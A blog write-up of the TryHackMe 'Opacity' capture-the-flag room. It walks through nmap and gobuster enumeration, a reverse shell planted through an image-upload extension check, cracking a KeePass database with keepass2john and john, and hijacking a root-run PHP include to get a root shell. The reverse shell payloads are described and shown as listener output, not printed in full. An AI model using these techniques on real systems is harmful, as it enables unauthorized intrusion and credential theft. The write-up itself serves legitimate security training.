Post

TryHackMe: Opacity

Posted
Preview Image
By pullupnghost
5 min read
TryHackMe: Opacity

Opacity was a very simple room, not much to say about it. I like every room but some are sort of boring. I still feel motivated, just seeking a bigger challenge, but i don’t want to go up 2 steps at once. Let the wind blow you in the right way.

Room https://tryhackme.com/room/opacity

Initial Enumeration

Nmap Scan

We start with our nmap scan:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -T4 -n -sC -sV -Pn -p- 10.10.131.208
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-12 14:48 GMT
Nmap scan report for 10.10.131.208
Host is up (0.061s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0f:ee:29:10:d9:8e:8c:53:e6:4d:e3:67:0c:6e:be:e3 (RSA)
|   256 95:42:cd:fc:71:27:99:39:2d:00:49:ad:1b:e4:cf:0e (ECDSA)
|_  256 ed:fe:9c:94:ca:9c:08:6f:f2:5c:a6:cf:4d:3c:8e:5b (ED25519)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
| http-title: Login
|_Requested resource was login.php
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-02-12T14:49:16
|_  start_date: N/A
|_nbstat: NetBIOS name: OPACITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.63 seconds

Web 80

We see smb working, but we can’t get anything from it, so we proceed to port 80: Web 80

Gobuster Scan

Nothing that we could find at first glance, so we do our gobuster scan:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x ".txt,.html,.php" -t 25 --timeout 20s -u http://10.10.131.208 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.131.208
[+] Method:                  GET
[+] Threads:                 25
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,html,php
[+] Timeout:                 20s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 278]
/.html                (Status: 403) [Size: 278]
/index.php            (Status: 302) [Size: 0] [--> login.php]
/login.php            (Status: 200) [Size: 848]
/css                  (Status: 301) [Size: 312] [--> http://10.10.131.208/css/]
/logout.php           (Status: 302) [Size: 0] [--> login.php]
/cloud                (Status: 301) [Size: 314] [--> http://10.10.131.208/cloud/]
...

We found a cloud directory, and inside had the following: Web 80 Cloud

A web page where we can enter an image url, and it stores it for the duration of 5 minutes. And after some playing around, we got to know that it only detects if it ends on .jpg, .png, etc.. and not if it really is an image url.

Shell as www-data

This means we can send a reverse shell without any problems. We first start a python http server and a listener on our machine and then enter the following on the page: Shell Upload

Now we just have to go to the page created and remove the image extension that we added: Web Shell

And we are in:

1
2
3
4
5
6
7

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -vlnp 4444
...
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Shell as sysadmin

While enumerating, we can find, inside the opt folder, a .kdbx file:

1
2
3
4
5

$ ls -la
total 12
drwxr-xr-x  2 root     root     4096 Jul 26  2022 .
drwxr-xr-x 19 root     root     4096 Jul 26  2022 ..
-rwxrwxr-x  1 sysadmin sysadmin 1566 Jul  8  2022 dataset.kdbx

After a simple google search, we see a Exploit Notes page explaining how to access this file and what it is, so all we have to do is follow the steps. We first download the file to our machine through netcat and then use keepass2john to create a hash that we can use with the normal john to get the password for the keepass database:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

┌──(kali㉿kali)-[~/Desktop]
└─$ keepass2john dataset.kdbx > hash
┌──(kali㉿kali)-[~/Desktop]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash              
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 100000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
741852963        (dataset)     
1g 0:00:00:06 DONE (2025-02-12 15:36) 0.1536g/s 135.1p/s 135.1c/s 135.1C/s chichi..david1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

We can then use the password on the keepass file and get access to the database: KeePassXC Creds

Inside, we see sysadmin credentials to ssh, so now we can log into him and get the local flag:

1
2
3
4
5
6
7

┌──(kali㉿kali)-[~/Desktop]
└─$ ssh sysadmin@10.10.131.208                  
sysadmin@10.10.131.208's password: 
sysadmin@opacity:~$ ls
local.txt  scripts
sysadmin@opacity:~$ cat local.txt
[REDACTED]

Shell as root

Inside sysadmin, we found a folder called scripts that had another folder inside called lib and a script.php file with the following code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

<?php

//Backup of scripts sysadmin folder
require_once('lib/backup.inc.php');
zipData('/home/sysadmin/scripts', '/var/backups/backup.zip');
echo 'Successful', PHP_EOL;

//Files scheduled removal
$dir = "/var/www/html/cloud/images";
if(file_exists($dir)){
    $di = new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS);
    $ri = new RecursiveIteratorIterator($di, RecursiveIteratorIterator::CHILD_FIRST);
    foreach ( $ri as $file ) {
        $file->isDir() ?  rmdir($file) : unlink($file);
    }
}
?>

After looking inside the lib folder, we see that we can’t edit the backup.inc.php file, but we can remove it. This means that we can upload our own copy of the file and get a root shell.

We will just use a simple php file with only the exec() command with the reverse shell inside. After that, we just have to send the file into the lib folder and wait a bit, we will get a root shell and can then read the proof flag:

1
2
3
4
5
6
7
8

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -vlnp 4444
...
root@opacity:~# ls
proof.txt
snap
root@opacity:~# cat proof.txt
[REDACTED]
TryHackMe
web ssh reverse shell
This post is licensed under CC BY 4.0 by the author.